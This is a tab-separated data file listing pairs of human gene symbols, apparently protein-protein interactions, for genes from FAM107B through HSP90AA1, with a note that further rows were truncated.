DYNLL1	FAM107B
RPA2	FAM107B
AKT1S1	FAM114A1
HSPA4	FAM114A1
IQCJ-SCHIP1	FAM114A1
N4BP1	FAM114A1
NKAP	FAM124A
SRPK1	FAM124A
UBC	FAM129B
RAD51	FAM175A
APC	FAM214A
UBC	FAM216A
RAB2A	FAM71C
APITD1	FANCA
ATP5B	FANCA
AZIN1	FANCA
BRCA1	FANCA
CAPN1	FANCA
DNAJB1	FANCA
DUS4L	FANCA
IKBKB	FANCA
ILK	FANCA
KRT1	FANCA
PCNA	FANCA
PIK3R1	FANCA
PLCG1	FANCA
POLN	FANCA
PRPF31	FANCA
CSK	FAU
CSNK2A2	FAU
CUL1	FAU
DDX42	FBXO25
DEPTOR	FBXO25
WDSUB1	FBXO25
PER1	FBXW11
CBL	FCGR2A
CRP	FCGR2A
CRYAB	FCGR2A
HCK	FCGR2A
APCS	FCGR2B
CRP	FCGR2B
APCS	FCGR3A
CD38	FCGR3A
LCK	FCGR3A
B2M	FCGRT
CA6	FCGRT
FCGRT	FCGRT
FCHO2	FCHO1
DAB2	FCHO2
FCHO2	FCHO2
UBC	FEM1A
PFAS	FERMT2
TBCB	FERMT2
PDLIM3	FHL1
HSPA1L	FIGNL1
FILIP1	FILIP1
HSF1	FILIP1
PRMT6	FIP1L1
SRRM2	FIP1L1
AKT1	FKBP5
SRF	FLI1
AKAP12	FLNA
CDC42	FLNA
F3	FLNA
G3BP1	FLNA
MDC1	FLNB
SF3A3	FLNC
STAU1	FMR1
TBK1	FMR1
ALB	FN1
APOA1	FN1
ATXN10	FN1
ATXN7	FN1
C1QB	FN1
C1QC	FN1
C1S	FN1
C3	FN1
C4A	FN1
C4BPA	FN1
C6	FN1
C9	FN1
CASP14	FN1
CD79A	FN1
CFB	FN1
COL8A1	FN1
CTGF	FN1
CTSG	FN1
KPNA2	FN1
MFAP2	FN1
SERPINA7	FN1
SFRP2	FN1
SGCA	FN1
WASL	FNBP1
UBC	FOXN2
USP7	FOXN2
PGK1	FOXO3
ACTA1	FPGT-TNNI3K
RAC1	FRK
HNRNPA1	FRMD4A
CTNNB1	FRMD5
UBC	FRMD8
PPP1CA	FRMPD4
CDC25A	FTH1
CEP55	FTH1
CRMP1	FTH1
FXR2	FTH1
GRB2	FTH1
IQCJ-SCHIP1	FTH1
KPNA2	FTH1
MAX	FTH1
OPTN	FTH1
PIAS4	FTH1
TFRC	FTH1
DMWD	FTSJ1
EIF1B	FTSJ1
NASP	FTSJ1
PRMT1	FTSJ1
PSMA3	FTSJ1
PSMA6	FTSJ1
PSMB1	FTSJ1
PSMB3	FTSJ1
PSMB5	FTSJ1
PSMD12	FTSJ1
SARS	FTSJ1
SLIRP	FTSJ1
SF3B14	FTSJ3
ITGA4	FUBP1
PDGFA	FURIN
ATXN1L	FUS
CAMK1	FUS
CAND1	FUS
CDK9	FUS
COPS5	FUS
MBD3	FUS
MRPS18B	FUS
NEDD8	FUS
TAF15	FUS
SIT1	FYN
SUPT16H	FYTTD1
DVL2	GABARAP
DVL2	GALT
UBC	GAMT
CUTC	GANAB
ZFPM2	GATA4
EP300	GATA5
HDAC1	GATAD1
EPS15L1	GBF1
PRKAR2A	GCH1
MMS19	GEMIN2
SMN1	GEMIN2
SMYD2	GEMIN2
SNRPD3	GEMIN2
SNRPN	GEMIN2
SRSF2	GEMIN2
LGALS3	GEMIN4
MYC	GEMIN4
SNRPD2	GEMIN4
SNRPN	GEMIN4
EIF4E	GEMIN5
MAP3K5	GEMIN5
PLOD1	GEMIN5
UBL4A	GEMIN5
ADD1	GEMIN7
KAT5	GEMIN7
WRAP73	GET4
AURKB	GFAP
CAMK2A	GFAP
COL16A1	GFAP
PBK	GFAP
VIM	GFAP
COPS5	GFER
COPS8	GFER
TRIM55	GFM1
HIST1H4A	GFPT1
MAPK8	GFPT1
G3BP1	GIGYF2
YBX1	GIGYF2
YWHAZ	GIGYF2
GIMAP2	GIMAP2
GIMAP7	GIMAP2
BAX	GIMAP4
GINS2	GINS3
GINS4	GINS3
DPP4	GIP
APP	GJB1
CAV1	GJB2
IPO13	GK
OPLAH	GK
UBC	GLDC
NUPL2	GLE1
UBC	GLE1
UXT	GLE1
ITCH	GLI1
NUMB	GLI1
SKI	GLI2
ACTB	GNA12
ARHGEF11	GNA12
BTK	GNA12
ARHGEF1	GNA13
ARHGEF11	GNA13
PRKCD	GNA13
PRKCE	GNA13
CXCR1	GNA14
GNAI3	GNAI3
LDHA	GNAI3
SUMO1	GNAL
RUVBL1	GNAS
GADD45A	GNB2
RIPK3	GNB2
TSC22D4	GORASP2
UBC	GORASP2
UGDH	GORASP2
IL27RA	GOSR1
VWF	GP1BA
YWHAB	GP1BA
YWHAG	GP1BA
IQGAP1	GRB2
PTPRT	GRB2
RAB6B	GRB2
RAB8B	GRB2
SMARCA5	GSK3B
SMN1	GSK3B
GH1	GSTM3
CREB1	GTF2A1
KDM1A	GTF2I
SUZ12	GTF2I
TFAP4	GTF2I
USF1	GTF2I
USP7	GTF2I
YY1	GTF2I
ZBTB17	GTF2I
USF1	GTF2IRD1
GSTK1	GTF3C3
ILK	H1FX
HIST2H3A	H2AFX
CBX3	H2AFY
WDR77	H2AFY
WHSC1L1	H2AFY
FMR1	HABP4
PLXNA2	HACE1
ABCC4	HAX1
TSC1	HBA1
RICTOR	HDAC1
RUNX3	HDAC1
RUVBL1	HDAC1
SMC3	HDAC11
VDR	HDAC2
ZBTB7A	HDAC2
ZFPM2	HDAC2
CCT4	HDAC3
CCT8	HDAC3
CNOT2	HDAC3
CNTN2	HDAC3
CORO2A	HDAC3
HDAC10	HDAC3
HDAC3	HDAC3
NFKBIA	HDAC3
NR0B2	HDAC3
NUDT21	HDAC3
PARP1	HDAC3
PCIF1	HDAC3
PIAS2	HDAC3
PIN1	HDAC3
RCOR1	HDAC3
RELA	HDAC3
REPIN1	HDAC3
RREB1	HDAC3
RUNX2	HDAC3
SNAI1	HDAC3
SPI1	HDAC3
SRC	HDAC3
SREBF2	HDAC3
SRF	HDAC3
TOP2B	HDAC3
TP53	HDAC3
WISP2	HDAC3
YWHAQ	HDAC3
YY1	HDAC3
ZBTB7A	HDAC3
ZBTB7B	HDAC3
ZNF148	HDAC3
ACTA1	HDAC4
ATF2	HDAC4
IKZF2	HDAC4
KDM5B	HDAC5
KPNB1	HDAC5
LTA4H	HDAC5
MCM6	HDAC5
MCM7	HDAC5
MDH2	HDAC5
NME1	HDAC5
NPEPPS	HDAC5
NR2E1	HDAC5
PGK1	HDAC5
PPP2R2D	HDAC5
PRDX4	HDAC5
PRKAB1	HDAC5
PRPF8	HDAC5
PSMA5	HDAC5
RPL7	HDAC5
RPL7A	HDAC5
RPS4X	HDAC5
RPS8	HDAC5
RPSA	HDAC5
TBL1XR1	HDAC5
TCP1	HDAC5
TFRC	HDAC5
TKT	HDAC5
TOP1	HDAC5
TPI1	HDAC5
TRAP1	HDAC5
TRIM28	HDAC5
USP7	HDAC5
VCP	HDAC5
VDAC1	HDAC5
WDR5	HDAC5
XPOT	HDAC5
XRCC5	HDAC5
XRCC6	HDAC5
YWHAQ	HDAC5
YWHAZ	HDAC5
YY1	HDAC5
ZBTB7B	HDAC5
BCL3	HDAC6
CDKN1A	HDAC6
EGFR	HDAC6
EHHADH	HDAC6
FBP1	HDAC6
FNTA	HDAC6
GARS	HDAC6
NEK3	HDAC6
NR0B2	HDAC6
PPA1	HDAC6
PRDX4	HDAC6
SMAD7	HDAC6
SMARCC1	HDAC6
SOD1	HDAC6
STUB1	HDAC6
TPPP	HDAC6
UBC	HDAC6
USP47	HDAC6
IKZF4	HDAC7
KLF4	HDAC7
MARK2	HDAC7
MARK3	HDAC7
NUP214	HDAC9
PARP1	HDAC9
YWHAE	HDAC9
CKAP4	HDGF
DHX9	HDGF
DIMT1	HDGF
DNAJA1	HDGF
H1FX	HDGF
MCTS1	HDGF
MRTO4	HDGF
PARP1	HDGF
POLRMT	HDGF
RPA1	HELB
UBC	HELB
CIAO1	HELLS
HDAC2	HELLS
PROP1	HESX1
HEXB	HEXB
RPL22	HEXB
TUBB3	HEXDC
ACTN4	HGS
AES	HGS
AHCYL1	HGS
APC	HGS
APLP2	HGS
APP	HGS
ARL6IP1	HGS
ARMC8	HGS
ITCH	HGS
JAG1	HGS
MAP3K7	HGS
MAT2A	HGS
TADA2A	HGS
TFRC	HGS
UBC	HILPDA
SIN3A	HINT1
SP1	HINT1
UBC	HINT1
CLTA	HIP1R
DYNLL1	HIP1R
HIP1R	HIP1R
ITGA4	HIP1R
MAP3K7	HIPK2
MLLT1	HIST1H1B
HIST1H2AD	HIST1H1C
ICAM1	HIST1H1C
ITGA4	HIST1H1C
DOT1L	HIST1H2AA
EIF4A3	HIST1H2AA
RAD18	HIST1H2AA
ITGA4	HIST1H2AG
MGMT	HIST1H2AG
YWHAQ	HIST1H2AG
RCC1	HIST2H2AA3
RNF168	HIST2H2AA3
BAZ1B	HIST2H2AC
CDY1	HIST2H2AC
CRP	HIST2H2AC
HAT1	HIST2H2AC
HIST1H2BA	HIST2H2AC
MORF4L1	HIST2H2AC
PSMD4	HIST2H2AC
CBX6	HIST2H2BE
COPS5	HIST2H2BE
CUL1	HIST2H2BE
CUL2	HIST2H2BE
DNMT3L	HIST2H2BE
DYRK2	HIST2H2BE
ENY2	HIST2H2BE
TNFRSF1A	HIST3H3
HPD	HIVEP1
CAPN2	HK1
B2M	HLA-A
KIR2DS2	HLA-C
KIR2DS4	HLA-C
LILRB2	HLA-C
CD82	HLA-DMA
UBC	HLA-DOA
HLA-DMA	HLA-DOB
HLA-DMB	HLA-DOB
HLA-E	HLA-E
CSNK1A1	HMGB2
EIF1B	HMGB2
ESR1	HMGB2
HMGB1	HMGB2
NR3C1	HMGB2
POU5F1	HMGB2
ASL	HMOX1
YWHAQ	HNRNPA1
YWHAZ	HNRNPA1
ZC3HC1	HNRNPA1
SSR3	HNRNPC
PTRF	HNRNPH1
RANBP2	HNRNPH1
RIPK3	HNRNPH1
SF3B4	HNRNPH1
ANXA11	HNRNPH3
DDX17	HNRNPH3
DDX5	HNRNPH3
EEF1G	HNRNPH3
ESR1	HNRNPK
GAA	HNRNPK
ITGA4	HNRNPK
ITK	HNRNPK
KHDRBS2	HNRNPK
NPLOC4	HNRNPR
SFPQ	HNRNPR
CDKN2A	HNRNPU
EMD	HNRNPU
ILK	HNRNPU
ITGA5	HNRNPU
KIAA2013	HNRNPU
MAGOH	HNRNPU
MAP3K14	HNRNPU
MARCKS	HNRNPU
MCM5	HNRNPU
MORF4L1	HNRNPU
POU3F4	HNRNPU
SFN	HNRNPU
U2AF2	HNRNPU
AGAP2	HOMER2
APP	HOMER2
GRM1	HOMER2
KPNA2	HOMER2
APP	HOMER3
CEBPB	HOMER3
DYNLL2	HOMER3
HOMER1	HOMER3
MOS	HOMER3
PAX6	HOMER3
PKN1	HOMER3
PSMA2	HOMER3
RUNX1T1	HOMER3
SHANK1	HOMER3
TRPC5	HOMER3
HOXC8	HOMEZ
SUMO2	HOMEZ
UBC	HOMEZ
ANK3	HOOK1
HOOK1	HOOK1
VCP	HOOK1
VPS18	HOOK1
VPS39	HOOK1
VPS41	HOOK1
ZNF250	HOOK1
ABLIM1	HOOK2
AKTIP	HOOK2
APEX2	HOOK2
GSK3B	HSD17B4
HSD17B4	HSD17B4
MAPK8	HSD17B4
ASB17	HSP90AA1
AURKB	HSP90AA1
CEP97	HSP90AA1
CERS2	HSP90AA1
CFTR	HSP90AA1
CHEK1	HSP90AA1
CKS1B	HSP90AA1
CSF1R	HSP90AA1
DAPK3	HSP90AA1
FBXO24	HSP90AA1
FBXO27	HSP90AA1
FBXO28	HSP90AA1
KLHL23	HSP90AA1
KLHL25	HSP90AA1
KLHL26	HSP90AA1
PDRG1	HSP90AA1
PRKCH	HSP90AA1
RNF40	HSP90AA1
RPL32	HSP90AA1
RPL5	HSP90AA1
RPL7	HSP90AA1
TRIM56	HSP90AA1
UBL4A	HSP90AA1
UCHL1	HSP90AA1
VPS41	HSP90AA1
WASL	HSP90AA1
WNK4	HSP90AA1
WSB2	HSP90AA1
WWP1	HSP90AA1
YWHAZ	HSP90AA1
ZAP70	HSP90AA1
ZBED4	HSP90AA1
ZBTB20	HSP90AA1
ZBTB49	HSP90AA1
ZNF215	HSP90AA1
[truncated: 4,792 more rows]
